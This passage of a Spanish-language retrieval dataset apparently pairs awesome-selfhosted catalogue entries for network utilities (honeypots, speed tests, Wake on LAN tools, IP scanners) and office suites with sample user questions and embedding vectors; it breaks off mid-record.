Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability and more [⚠, MIT, Nodejs/Docker]. MySpeed β€” Speed test analysis software that shows your internet speed for up to 30 days [MIT, Docker/Nodejs]. NetAlertX β€” Network intruder and presence detector. Scans for devices connected to your network and alerts you if new and unknown devices are found [GPL-3.0, Docker]. PlugNPiN β€” Automatically scrapes containers with specific labels and creates local DNS/CNAME entries in Pi-Hole/AdGuard Home and proxy hosts in Nginx Proxy Manager [GPL-3.0, Docker].", "indexar": "que herramienta sirve para detectar y analizar ciberataques sin ser una simple alerta?", "v": [-0.14125, 0.04475, -0.23001, -0.20723, 0.02676, -0.16265, -0.10702, 0.00486, -0.06616, -0.06185, -0.05713, -0.07896, -0.06434, -0.0501, 0.2516, 0.03098, -0.00547, -0.12086, 0.09385, -0.01937, 0.09434, 0.00119, -0.03566, -0.08144, -0.13826, -0.0033, 0.01143, -0.01123, -0.10828, 0.0559, -0.09419, 0.01195, 0.07626, -0.01281, -0.10112, 0.03749, -0.10031, -0.07211, 0.0137, 0.06403, -0.02395, 0.09979, -0.01041, 0.0307, -0.00161, 0.04449, -0.05862, -0.0228, 0.03141, 0.11095, -0.03493, -0.01782, -0.1195, 0.00406, -0.05181, -0.03694, 0.10161, -0.02355, 0.14691, -0.20896, -0.07206, -0.01846, -0.06613, -0.03735, 0.0469, -0.02832, 0.05197, -0.0213, -0.03931, -0.01086, -0.03553, -0.03166, 0.06325, 0.04466, 0.00681, -0.02007, 0.03067, 0.01833, 0.1381, -0.00233, 0.06992, -0.00099, -0.03242, 0.05236, -0.02226, -0.07249, 0.07727, 0.00276, 0.02138, -0.09028, -0.0238, 0.14964, 0.02838, 0.01855, 0.03045, 0.03146, 0.11471, -0.06569, -0.06047, 0.00904, 0.13335, -0.14554, -0.08776, 0.06426, 0.01851, 0.0273, -0.06646, -0.01062, -0.09617, -0.05977, 0.01339, 0.00977, 0.01632, -0.03296, -0.01208, 0.06112, 0.01578, -0.01823, -0.06418, 0.01726, 0.02198, 0.02575, -0.10206, -0.07014, -0.02738, -0.05643, -0.02668, -0.00512, 0.04093, -0.01321, -0.0036, -0.00332, -0.12001, 0.03102, -0.06702, -0.01793, -0.02293, -0.1505, -0.07372, -0.01816, 0.00749, 0.0917, -0.07031, -0.06883, 0.03273, 0.08512, 0.01163, 0.01901, -0.05772, 0.01814, 0.01208, -0.0333, -0.05336, 0.00012, -0.03221, -0.03269, -0.00259, 0.03043, -0.08803, -0.01809, -0.01865, -0.05087, 0.07233, -0.01841, 0.0986, -0.02519, 0.09471, -0.00259, 0.11762, 0.06928, 0.03499, -0.03778, 0.08499, -0.07768, -0.00497, -0.05122, -0.02473, -0.01343, -0.01193, -0.09294, -0.02482, -0.02429, -0.01079, -0.03501, -0.01921, -0.0059, 0.05835, -0.02587, -0.01706, 0.03343, 0.07233, 0.01921, -0.0066, -0.04192, 0.10265, 0.05184, 0.04167, -0.03469, 0.03664, -0.0027, -0.05078, -0.02529, -0.01691, -0.00573, -0.00283, 0.06876, -0.04084, -0.005, 0.0309, 0.0236, -0.00569, 0.00148, 0.02952, -0.04667, -0.00367, -0.0238, -0.0189, 0.04856, -0.02629, 0.04778, -0.01829, 0.00313, 0.04452, -0.01406, -0.04054, 0.0403, -0.04807, -0.01045, 0.08876, -0.03255, 0.0274, -0.03304, -0.02082, 0.06554, -0.02736, -0.11697, 0.01404, -0.01602, -0.05555, -0.03215, 0.03109, 0.03561, 0.01007, -0.00309, -0.0127, -0.04645, 0.01956, -0.02225, -0.02178, -0.04613, -0.02154, 0.02171, 0.05899, -0.02191, 0.01845, -0.00434]} -{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: beelzebub β€” Honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks [⚠, MIT, Docker/K8S/Go]. Canary Tokens β€” Generates lightweight, embedded honeypot triggers called canary tokens for detecting unauthorized access [BSD-3-Clause, Docker/Python]. MyIP β€” All in one IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability and more [⚠, MIT, Nodejs/Docker]. MySpeed β€” Speed test analysis software that shows your internet speed for up to 30 days [MIT, Docker/Nodejs]. NetAlertX β€” Network intruder and presence detector. Scans for devices connected to your network and alerts you if new and unknown devices are found [GPL-3.0, Docker]. PlugNPiN β€” Automatically scrapes containers with specific labels and creates local DNS/CNAME entries in Pi-Hole/AdGuard Home and proxy hosts in Nginx Proxy Manager [GPL-3.0, Docker].", "indexar": "con quΓ© puedo generar seΓ±ales falsas para saber si alguien intenta acceder a mi sistema de forma no autorizada?", "v": [0.0661, 0.19681, -0.18514, -0.02018, -0.02633, -0.04027, -0.16313, -0.09836, -0.20227, -0.09558, -0.08718, -0.03218, 0.01738, 0.00317, 0.19191, 0.03216, 0.01935, -0.03069, 0.00663, 0.01187, 0.00821, -0.0764, -0.08532, -0.20666, -0.03473, -0.06573, -0.01657, -0.04601, -0.05139, -0.0535, -0.00917, -0.01537, 0.09052, -0.04938, -0.06944, 0.08521, -0.0531, 0.09312, 0.08573, 0.01752, 0.12311, 0.07124, 0.00257, -0.09462, 0.07199, -0.05758, -0.10716, -0.02251, 0.03444, 0.00297, -0.04789, -0.12626, -0.20073, -0.03995, -0.039, -0.11412, 0.16418, -0.02921, 0.02903, -0.01229, -0.00825, -0.07119, 0.02016, 0.03714, 0.00123, 0.04453, 0.12766, -0.00278, -0.04063, 0.05368, -0.00245, -0.04168, 0.05951, 0.06115, 0.03712, 0.00091, -0.07146, -0.08788, 0.13161, 0.01879, 0.01676, 0.01426, -0.03023, 0.04368, 0.0914, -0.05002, -0.05357, 0.0041, -0.07324, -0.10691, -0.04127, 0.06912, 0.05481, 0.0481, 0.03654, 0.00254, -0.12879, -0.07673, -0.17525, -0.0169, -0.01724, -0.03272, -0.07529, 0.11335, -0.08404, -0.09963, 0.04037, -0.01794, 0.07613, -0.00772, -0.02582, -0.004, -0.07558, 0.01786, 0.02435, 0.1235, 0.02367, -0.07449, -0.02907, 0.10357, -0.0579, 0.00541, 0.01169, -0.00483, 0.01344, 0.01911, 0.00358, 0.02715, 0.02647, 0.04798, -0.02026, -0.00363, -0.00103, -0.06777, 0.00031, 0.00271, -0.02643, -0.03833, 0.00999, 0.00953, 0.00857, 0.10218, -0.01138, -0.05655, -0.04925, 0.02324, -0.03074, -0.0974, -0.05779, -0.02783, -0.02633, 0.03009, 0.05707, -0.01896, 0.03155, -0.02602, 0.1075, -0.09253, 0.00651, 0.07851, -0.00421, 0.09366, -0.07981, -0.01193, 0.02256, 0.01769, -0.03054, -0.01164, 0.01728, 0.01942, -0.04174, 0.00814, 0.06394, -0.05838, 0.05093, 0.02301, -0.09227, -0.0654, -0.07354, -0.04272, 0.01796, 0.02295, 0.10217, -0.0033, 0.05006, 0.04359, 0.00369, 0.06968, 0.02719, 0.05708, 0.04892, 0.01319, -0.00218, -0.01187, 0.03356, 0.02955, 0.03708, -0.04404, 0.00395, 0.03235, -0.02333, -0.0113, -0.00059, 0.00098, 0.01488, 0.00383, 0.00865, -0.0311, 0.03475, 0.05651, 0.09799, -0.01151, 0.04273, -0.08536, -0.10242, 0.05564, -0.03982, 0.04627, 0.00977, -0.0128, 0.02468, 0.00674, 0.0292, 0.06889, -0.04644, -0.00878, 4e-05, 0.03081, -0.02061, 0.01277, -0.00778, -0.01216, 0.0407, 0.03055, 0.00083, -0.07926, 0.01344, -0.0125, -0.04724, -0.07871, 0.03839, 0.06046, 0.01726, -0.01939, 0.01218, -0.02854, 0.00734, -0.03653, -0.00031, -0.0697, -0.00945, 0.01874, 0.00639, -0.04583, 0.10587, -0.04667]} -{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: beelzebub β€” Honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks [⚠, MIT, Docker/K8S/Go]. Canary Tokens β€” Generates lightweight, embedded honeypot triggers called canary tokens for detecting unauthorized access [BSD-3-Clause, Docker/Python]. MyIP β€” All in one IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability and more [⚠, MIT, Nodejs/Docker]. MySpeed β€” Speed test analysis software that shows your internet speed for up to 30 days [MIT, Docker/Nodejs]. NetAlertX β€” Network intruder and presence detector. Scans for devices connected to your network and alerts you if new and unknown devices are found [GPL-3.0, Docker]. PlugNPiN β€” Automatically scrapes containers with specific labels and creates local DNS/CNAME entries in Pi-Hole/AdGuard Home and proxy hosts in Nginx Proxy Manager [GPL-3.0, Docker].", "indexar": "cual es el programa mejor para hacer pruebas de velocidad de internet durante varios dΓ­as consecutivos?", "v": [-0.01098, 0.15358, -0.13157, -0.0375, -0.04655, -0.01633, -0.00746, -0.07243, -0.00667, -0.13391, 0.03864, -0.03051, -0.07859, -0.10085, 0.06447, 0.01852, 0.00693, -0.04085, 0.07745, -0.03451, -0.01934, -0.12334, -0.04353, -0.07078, 0.0348, 0.0282, -0.01273, 0.08075, -0.09039, -0.04785, -0.03999, 0.08902, 0.10973, -0.07444, -0.11109, -0.01818, 0.05598, 0.19638, 0.02565, -0.00491, 0.02896, -0.0289, -0.07765, -0.11009, 0.18758, 0.05511, -0.05744, 0.01124, -0.03067, -0.18385, 0.03069, 0.08605, 0.05909, -0.05237, -0.01614, -0.08009, 0.01226, -0.1557, -0.02519, -0.07108, 0.07131, -0.01734, 0.00735, -0.00299, 0.03805, 0.03021, 0.09861, -0.06043, -0.12739, 0.009, 0.04746, 0.04053, 0.03981, -0.05189, -0.02876, 0.03964, -0.01247, -0.00305, -0.04815, -0.03732, -0.06245, -0.04968, 0.01882, 0.05742, -0.13182, -0.01083, 0.01518, -0.12737, -0.01609, -0.00196, 0.0909, 0.08631, 0.04552, 0.09003, 0.05254, -0.03119, 0.13, -0.02972, 0.07745, -0.01827, 0.04168, 0.04511, -0.15501, 0.08056, -0.14864, 0.01251, 0.06696, 0.05683, -0.03681, 0.0046, 0.03895, -0.05315, -0.08926, -0.09366, -0.12666, -0.09464, 0.02101, -0.12587, -0.06649, -0.0068, -0.08023, 0.03604, -0.10331, 0.02721, 0.08153, 0.02693, 0.05487, -0.0066, -0.01416, 0.03139, 0.08422, 0.06003, -0.05954, -0.10158, -0.07066, 0.04703, -0.01499, -0.02007, -0.0102, -0.067, 0.08721, -0.0189, -0.03458, 0.0152, 0.07542, -0.04162, -0.05187, -0.03774, -0.09823, 0.05362, -0.08003, 0.06116, -0.0033, 0.01605, -0.08718, -0.05004, -0.06769, -0.048, -0.0053, 0.04346, 0.0083, -0.03062, 0.02064, 0.03413, 0.04028, 0.0345, -0.04441, 0.12125, 0.01434, 0.01575, -0.02791, 0.03973, -0.0646, -0.11738, 0.02889, 0.02051, -0.01304, -0.02262, -0.04536, -0.06487, -0.08876, 0.05561, 0.00068, -0.01675, -0.02688, -0.06961, -0.00805, 0.04631, 0.01844, 0.04453, 0.01523, -0.00102, 0.00803, 0.06571, 0.01726, -0.00486, -0.01869, 1e-05, 0.0753, -0.05386, -0.09106, -0.10735, -0.04953, -0.00474, 0.00159, 0.07893, 0.00486, -0.04263, 0.01775, 0.06339, -0.03641, -0.03146, 0.07666, -0.05486, -0.07971, -0.03097, 0.04637, -0.06279, -0.06996, 0.02001, 0.04654, 0.0088, 0.00135, 0.05298, -0.05112, 0.02362, 0.08577, 0.04923, 0.00367, 0.01851, -0.03684, -0.02503, 0.01081, -0.0612, 0.04683, -0.02378, 0.00368, -0.0255, 0.00089, -0.0286, -0.04881, 0.10153, -0.00705, -0.02691, 0.04273, 0.02912, -0.0555, -0.03582, -0.00983, -0.00255, -0.06939, -0.00373, 0.02534, -0.06008, 0.06334, 0.04955]} -{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: Speed Test by OpenSpeedTestβ„’ β€” Free & Open-Source HTML5 Network Performance Estimation Tool [MIT, Docker]. Speedtest Tracker β€” Monitor the performance and uptime of your internet connection [MIT, Docker/K8S]. Upsnap β€” A simple Wake on LAN (WOL) dashboard app. Wake up devices on your network and see current status [MIT, Go/Docker]. Wakupator β€” Wake On LAN Machine Manager based on network traffic [MIT, C]. WatchYourLAN β€” Lightweight network IP scanner with notifications, history, export to Grafana [MIT, Docker/Go/deb]. whois β€” WHOIS/RDAP query API for domains, IP addresses, CIDR prefixes and ASNs, with unified JSON output, caching, API key authentication, batch queries and MCP support for AI assistants [MIT, Go/Docker].", "indexar": "que herramienta de red me sirve para hacer una prueba de velocidad?", "v": [-0.00846, 0.04886, -0.19017, -0.19272, -0.02111, -0.00998, -0.18133, 0.00774, 0.13845, -0.12837, -0.0789, -0.0744, -0.06192, -0.12592, 0.0971, 0.12048, -0.01157, -0.01795, -0.01958, -0.04917, 0.09634, -0.13049, -0.12799, -0.09251, 0.03664, 0.09345, 0.07096, 0.03292, -0.19223, -0.00373, -0.00043, 0.09631, 0.06484, -0.08184, -0.13449, 0.00072, -0.00263, 0.01372, 0.02056, 0.10089, -0.05005, 0.03731, -0.05255, -2e-05, 0.09756, 0.06981, -0.02385, 0.0407, -0.08533, 0.04962, 0.02464, -0.18182, -0.06367, -0.10897, -0.05113, -0.09478, 0.13796, -0.11481, -0.07028, -0.10724, -0.00131, -0.09347, -0.068, -0.02543, 0.01595, -0.03988, 0.02115, -0.05442, -0.12847, 0.04269, 0.01084, 0.01981, -0.00544, -0.03727, -0.06318, -0.04485, -0.0051, 0.02078, 0.03463, -0.01201, 0.06347, 0.041, -0.131, -0.02016, 0.01576, -0.09374, 0.07164, -0.07552, 0.04713, -0.00579, 0.01482, 0.05682, 0.09018, 0.00675, 0.01431, -0.00116, 0.0952, -0.05236, 0.05414, -0.04291, 0.16266, -0.06378, -0.10253, -0.0073, -0.02571, 0.03424, 0.02185, 0.02065, 0.00515, 0.01401, 0.12346, 0.02399, -0.01755, -0.02956, -0.05641, 0.02921, -0.01255, -0.07539, -0.10738, -0.00693, -0.01852, 0.03269, -0.13258, -0.05702, -0.01845, -0.04026, -0.03076, 0.00259, -0.00299, -0.01955, 0.0831, 0.03456, -0.06899, -0.06733, -0.04722, 0.0188, -0.03047, -0.13641, 0.00225, -0.06844, 0.06419, 0.0147, -0.08343, -0.11656, -0.03734, 0.06993, 0.02514, -0.02076, -0.05808, 0.04923, -0.02891, -0.0889, -0.03254, -0.01779, -0.06456, -0.03238, 0.03051, 0.01958, -0.04163, 0.02649, -0.00777, -0.01591, 0.02168, 0.03208, 0.01303, -0.04049, 0.0318, 0.03233, 0.06426, -0.01941, 0.00864, -0.02824, -0.01113, -0.06034, 0.05617, -0.01031, -0.05706, -0.0355, -0.03348, -0.09875, -0.00669, -0.01218, -0.08014, -0.05108, 0.03089, -0.06082, 0.03043, -0.01976, 0.0619, -0.00132, 0.024, 0.03957, 0.08053, -0.02206, 0.0464, 0.07866, 0.01012, -0.02143, 0.03789, -0.02455, -0.09343, -0.06806, -0.05604, -0.01099, 0.0012, 0.06673, 0.01949, 0.02418, -0.01135, 0.02594, 0.00729, 0.06061, 0.09221, 0.01577, -0.02031, 0.00565, 0.0689, 0.01096, -0.03393, -0.04002, 0.0558, 0.01164, -0.0098, 0.06243, -0.04295, 0.06049, 0.04463, -0.03457, 0.01303, -0.01678, 0.05132, -0.02673, -0.00357, -0.00959, 0.04526, -0.05744, 0.03344, -0.00061, -0.05515, -0.06212, -0.03738, 0.03499, -0.01829, -0.01742, 0.0115, 0.0259, -0.01013, -0.0392, -0.0037, -0.04913, -0.04247, -0.0285, 0.07909, -0.05203, 0.02591, 0.00946]} -{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: Speed Test by OpenSpeedTestβ„’ β€” Free & Open-Source HTML5 Network Performance Estimation Tool [MIT, Docker]. Speedtest Tracker β€” Monitor the performance and uptime of your internet connection [MIT, Docker/K8S]. Upsnap β€” A simple Wake on LAN (WOL) dashboard app. Wake up devices on your network and see current status [MIT, Go/Docker]. Wakupator β€” Wake On LAN Machine Manager based on network traffic [MIT, C]. WatchYourLAN β€” Lightweight network IP scanner with notifications, history, export to Grafana [MIT, Docker/Go/deb]. whois β€” WHOIS/RDAP query API for domains, IP addresses, CIDR prefixes and ASNs, with unified JSON output, caching, API key authentication, batch queries and MCP support for AI assistants [MIT, Go/Docker].", "indexar": "con que puedo controlar la actividad de mi conexiΓ³n a internet en tiempo real?", "v": [0.01045, 0.25137, -0.10699, -0.04812, 0.01561, -0.09679, -0.09468, 0.05412, -0.02652, -0.03249, -0.00392, -0.12227, 0.07325, -0.01844, 0.08883, -0.00071, -0.01375, -0.06524, 0.03452, -0.03984, -0.0429, -0.07675, -0.02919, 0.069, 0.00045, 0.02394, 0.05368, 0.04406, -0.09112, -0.00413, -0.07426, 0.03051, 0.07468, 0.03409, -0.02336, -0.06983, 0.02183, 0.20787, 0.14009, -0.02656, -0.02966, -0.01655, -0.06564, -0.00654, 0.15009, 0.09227, -0.02805, -0.12357, -0.05154, 0.00829, -0.12784, 0.04429, -0.05788, -0.04062, -0.05555, -0.06004, 0.05902, -0.13596, 0.05184, -0.12945, -0.06023, -0.01984, -0.01532, 0.0225, 0.03881, 0.09123, 0.07948, 0.00826, -0.0829, 0.13018, 0.0232, 0.02894, -0.13426, 0.0171, 0.06841, -0.02612, 0.04446, 0.02616, 0.00678, -0.03023, -0.01634, -0.03472, 0.00901, 0.0754, -0.08682, -0.08383, -0.04553, -0.20344, -0.04856, -0.00991, 0.01088, 0.09604, 0.00111, -0.05918, -0.0471, -0.01579, -0.04838, -0.02176, 0.03177, 0.0234, 0.06523, 0.14878, -0.19232, 0.13707, 0.03461, 0.01146, 0.06015, 0.04441, -0.06387, -0.03447, -0.02178, -0.05966, -0.03036, -0.11936, 0.02961, 0.03868, 0.00294, -0.09686, -0.01878, -0.07679, -0.06011, -0.08074, 0.04103, -0.01479, 0.02564, 0.0801, 0.01513, 0.00198, 0.00323, -0.02097, -0.04253, 0.00634, -0.02127, -0.16717, -0.02905, -0.0086, -0.07254, -0.0433, 0.02546, -0.05538, 0.00145, -0.01317, -0.0829, -0.03839, 0.05119, -0.04114, -0.08979, -0.01168, -0.11258, -0.05577, -0.05346, 0.04527, 0.00511, 0.06458, 0.05398, 0.07548, -0.03309, 0.01814, 0.0286, 0.06616, -0.01063, 0.0252, -0.03976, -0.07053, -0.00273, 0.00572, -0.1064, 0.03324, 0.02729, 0.03211, -0.12612, 0.02839, -0.02918, -0.06462, -0.02075, -0.00171, -0.02964, -0.01794, 0.03718, -0.08158, 0.00481, -0.00656, 0.0163, 0.01231, -0.04412, 0.03353, -0.01017, 0.01048, -0.04998, 0.04032, 0.02087, -0.03433, 0.0334, 0.12053, 0.05098, -0.01271, 0.01978, 0.03434, 0.04065, -0.05897, 0.01029, -0.09823, 0.02161, 0.00474, 0.01772, 0.05859, -0.01018, 0.05439, -0.02477, 0.02206, 0.0368, -0.03978, 0.08769, -0.0733, -0.03527, -0.01934, 0.10683, -0.0849, -0.02752, -0.04226, 0.05597, -0.0053, 0.04413, 0.02159, 0.00588, -0.01688, 0.03726, 0.04476, 0.02645, 0.00652, -0.04113, -0.0329, -0.03571, -0.06522, -0.01278, -0.04332, 0.05855, -0.07338, -0.03829, 0.01129, -0.03805, 0.04333, 0.01931, -0.0088, -0.00038, -0.0464, -0.12796, 0.00993, -0.02272, -0.06731, -0.05888, -0.00451, 0.06234, 0.00194, 0.03927, 0.02049]} -{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: Speed Test by OpenSpeedTestβ„’ β€” Free & Open-Source HTML5 Network Performance Estimation Tool [MIT, Docker]. Speedtest Tracker β€” Monitor the performance and uptime of your internet connection [MIT, Docker/K8S]. Upsnap β€” A simple Wake on LAN (WOL) dashboard app. Wake up devices on your network and see current status [MIT, Go/Docker]. Wakupator β€” Wake On LAN Machine Manager based on network traffic [MIT, C]. WatchYourLAN β€” Lightweight network IP scanner with notifications, history, export to Grafana [MIT, Docker/Go/deb]. whois β€” WHOIS/RDAP query API for domains, IP addresses, CIDR prefixes and ASNs, with unified JSON output, caching, API key authentication, batch queries and MCP support for AI assistants [MIT, Go/Docker].", "indexar": "cual programa libre puedo usar para despiertar mis dispositivos por red (Wake on LAN)?", "v": [-0.06978, 0.10919, -0.14231, -0.14644, -0.02676, -0.01151, -0.13588, -0.01884, -0.10346, -0.0692, -0.13864, -0.22295, -0.12718, -0.09053, -0.02287, 0.002, -0.00819, 0.0236, 0.10806, -0.10906, -0.06348, 0.03145, -0.1042, -0.07478, 0.00862, 0.13293, 0.18027, -0.07363, -0.07979, -0.04795, -0.03794, 0.00995, 0.06598, -0.00513, -0.06734, 0.02976, 0.03911, 0.04656, 0.11135, 0.06998, -0.00161, -0.01815, -0.02734, 0.01878, 0.1442, 0.00661, 0.10113, -0.07592, -0.03578, 0.05339, -0.07458, 0.01736, -0.04109, 0.00888, 0.01628, -0.10133, 0.12374, -0.05845, -0.07803, 0.0762, -0.01765, 0.00089, 0.04102, -0.07442, 0.04912, -0.07836, -0.00153, 0.09257, -0.06835, 0.06993, 0.06701, 0.0602, 0.07809, 0.04643, 0.0813, 0.13002, -0.14106, -0.11695, 0.11639, 0.02936, -0.02615, 0.03853, 0.04185, 0.01656, -0.01219, -0.08006, 0.12026, -0.06254, 0.00979, -0.03617, 0.03589, 0.04068, 0.00424, 0.04237, 0.09097, -0.11083, 0.10169, 0.0678, 0.0098, 0.09169, 0.07837, -0.02197, -0.09751, 0.13045, -0.00891, 0.00141, -0.02963, 0.00711, 0.00129, 0.00356, -0.02953, -0.08059, -0.09752, -0.04778, -0.09136, 0.01254, -0.05058, -0.05111, 0.0638, -0.02495, -0.00679, -0.04761, 0.00763, -0.01876, 0.15554, 0.03064, 0.01027, 0.07912, 0.00624, 0.04736, 0.09161, 0.01402, 0.02322, -0.09116, -0.10375, -0.06609, -0.00253, -0.03429, 0.07322, 0.02416, 0.05542, 0.06874, -0.0632, -0.03859, 0.03608, 0.06556, 0.02516, -0.03582, -0.05042, -0.00739, -0.00243, 0.04592, -0.02247, 0.02277, -0.02056, 0.03677, 0.05956, 0.01045, -0.03815, 0.06486, -0.06319, -0.02252, -0.01106, -0.07011, 0.01492, -0.04692, 0.01914, 0.02116, 0.03016, 0.0715, -0.01535, 0.09593, 0.0412, -0.05143, 0.00411, -0.09133, -0.05052, -0.00203, -0.00566, -0.12157, -0.02913, 0.06676, 0.02954, 0.00222, 0.00871, -0.00313, -0.0708, -0.02268, -0.03113, -0.02755, -0.06566, 0.02978, 0.04436, 0.02586, 0.05683, -0.00741, -0.01611, -0.07117, 0.02818, -0.02866, -0.07508, 0.00958, -0.02079, -0.04298, 0.04799, 0.03018, 0.03477, 0.05059, 0.04572, 0.10111, -0.01854, 0.00996, 0.06774, -0.00898, -0.07566, 0.00489, -0.02169, 0.02301, -0.00011, -0.03202, 0.05488, 0.00596, -0.00601, 0.08233, -0.01193, 0.01144, -0.02443, 0.0101, -0.02048, -0.00899, 0.00377, -0.03968, -0.03159, -0.02872, -0.01383, 0.00092, 0.02991, 0.03393, -0.0376, 0.00159, -0.03841, 0.06124, -0.00251, -0.04902, -0.03922, 0.0159, -0.07143, -0.0527, -0.03492, -0.03304, -0.01569, 0.0692, 0.06339, -0.09853, 0.03266, 0.06481]} -{"tipo": "pregunta", "herramienta": "Office Suites", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Office Suites", "tema": "office suites", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Office Suites: Collabora Online Development Edition β€” Collabora Online Development Edition (CODE) is a powerful LibreOffice-based online office that supports all major document, spreadsheet and presentation file formats, which you can integrate in your own infrastructure [MPL-2.0, C++]. CryptPad β€” Collaboration suite built to enable collaboration, synchronizing changes to documents in real time [AGPL-3.0, Nodejs/Docker]. Digislides β€” Create multimedia presentations in a quick and easy way. (documentation in French) [AGPL-3.0, Nodejs/PHP]. Etherpad β€” Highly customizable online editor providing collaborative editing in real-time [Apache-2.0, Nodejs/Docker]. Grist β€” Next-generation spreadsheet with relational structure, formula-based access control, and a portable, self-contained format (alternative to Airtable) [Apache-2.0, Nodejs/Python/Docker]. ONLYOFFICE β€” Office suite that enables you to manage documents, projects, team and customer relations in one place [AGPL-3.0, Nodejs/Docker].", "indexar": "ΒΏQuΓ© programa puedo usar para montar un oficina online con los formatos de LibreOffice?", "v": [-0.07924, 0.03459, -0.08702, -0.16616, -0.03698, -0.14267, 0.01927, -0.0808, -0.18347, -0.18024, -0.05703, -0.12954, 0.12074, -0.07194, -0.02931, 0.003, 0.13886, -0.18886, -0.05698, -0.03363, 0.002, 0.04433, -0.04958, -0.02723, 0.03709, -0.0319, 0.11627, -0.1462, -0.0678, 0.03086, 0.04624, 0.10729, 0.13293, 0.01175, 0.06701, 0.02327, -0.01473, -0.00649, 0.07507, 0.01948, 0.11918, 0.06397, -0.0509, 0.17878, 0.04392, 0.05551, 0.02795, 0.05156, -0.02817, 0.0306, -0.00525, -0.15502, -5e-05, 0.02985, -0.03436, -0.11021, 0.073, -0.0965, -0.03468, 0.0071, -0.03234, 0.07382, -0.03683, -0.04106, -0.03862, -0.01584, 0.05287, -0.01448, -0.08759, 0.04695, -0.03575, 0.01609, 0.04189, -0.03767, -0.09613, 0.08123, -0.12174, -0.05889, 0.03398, 0.04803, -0.00631, 0.05318, 0.03889, 0.04553, -0.0987, -0.16471, 0.06563, -0.03469, -0.03077, 0.00619, -0.02839, 0.096, 0.01513, -0.00912, -0.01321, -0.14082, 0.02929, -0.00589, 0.02186, 0.07038, -0.01341, 0.04497, -0.05687, 0.08013, -0.09384, 0.01844, -0.01383, -0.02632, -0.07778, -0.00652, 0.03454, 0.07454, -0.06402, 0.07797, -0.06808, -0.08567, 0.06935, 0.00969, -0.00191, -0.06252, -0.02499, 0.13823, -0.01051, 0.02277, 0.02353, -0.07101, 0.05738, 0.10839, -0.16076, 0.02207, -0.01565, -0.06858, -0.06888, -0.01895, 0.00799, -0.01984, 0.01157, -0.0935, -0.01889, -0.0524, 0.02423, 0.01408, -0.03674, 0.01294, 0.05874, -0.03507, 0.06697, -0.01135, -0.08695, -0.04917, 0.06635, 0.08196, 0.0579, 0.0424, -0.05881, -0.00088, -0.00688, -0.02967, -0.0632, 0.04971, -0.00446, 0.03509, 0.01989, 0.00586, -0.0087, -0.04066, -0.03868, -0.0012, 0.03427, 0.05688, 0.05812, 0.0028, 0.0703, -0.15256, 0.01685, -0.00423, -0.04917, -0.01333, 0.04123, -0.01164, -0.07435, 0.08405, 0.01731, 0.04196, -0.06103, 0.04985, 0.05793, -0.02271, -0.05154, 0.04742, -0.05341, 0.03279, -0.00189, -0.06149, 0.05447, -0.02089, -0.05314, -0.00734, 0.07527, -0.05494, -0.08322, -0.05944, -0.05992, 0.00058, 0.02584, 0.02446, -0.05831, 0.05208, 0.01069, 0.08455, -0.01481, -0.06563, 0.03258, -0.00774, 0.00325, -0.04424, 0.03835, -0.03123, 0.03878, 0.00888, 0.02611, -0.00807, 0.02442, -0.00545, 0.08317, -0.06193, 0.05367, -0.01779, 0.01036, 0.0377, 0.03019, 0.00669, -0.0197, -0.0514, -0.00643, -0.03583, 0.06917, 0.04171, -0.02968, -0.02779, -0.02371, 0.0986, -0.00982, 0.0079, -0.06891, 0.00869, -0.0671, 0.0073, -0.04769, 0.00136, -0.03475, 0.02882, -0.00417, -0.03659, -0.05759, -0.00229]} -{"tipo": "pregunta", "herramienta": "Office Suites", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Office Suites", "tema": "office suites", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Office Suites: Collabora Online Development Edition β€” Collabora Online Development Edition (CODE) is a powerful LibreOffice-based online office that supports all major document, spreadsheet and presentation file formats, which you can integrate in your own infrastructure [MPL-2.0, C++]. CryptPad β€” Collaboration suite built to enable collaboration, synchronizing changes to documents in real time [AGPL-3.0, Nodejs/Docker]. Digislides β€” Create multimedia presentations in a quick and easy way. (documentation in French) [AGPL-3.0, Nodejs/PHP]. Etherpad β€” Highly customizable online editor providing collaborative editing in real-time [Apache-2.0, Nodejs/Docker]. Grist β€” Next-generation spreadsheet with relational structure, formula-based access control, and a portable, self-contained format (alternative to Airtable) [Apache-2.0, Nodejs/Python/Docker]. ONLYOFFICE β€” Office suite that enables you to manage documents, projects, team and customer relations in one place [AGPL-3.0, Nodejs/Docker].", "indexar": "ΒΏCon quΓ© herramienta colaborativa puedo editar documentos y hojas de cΓ‘lculo en tiempo real?", 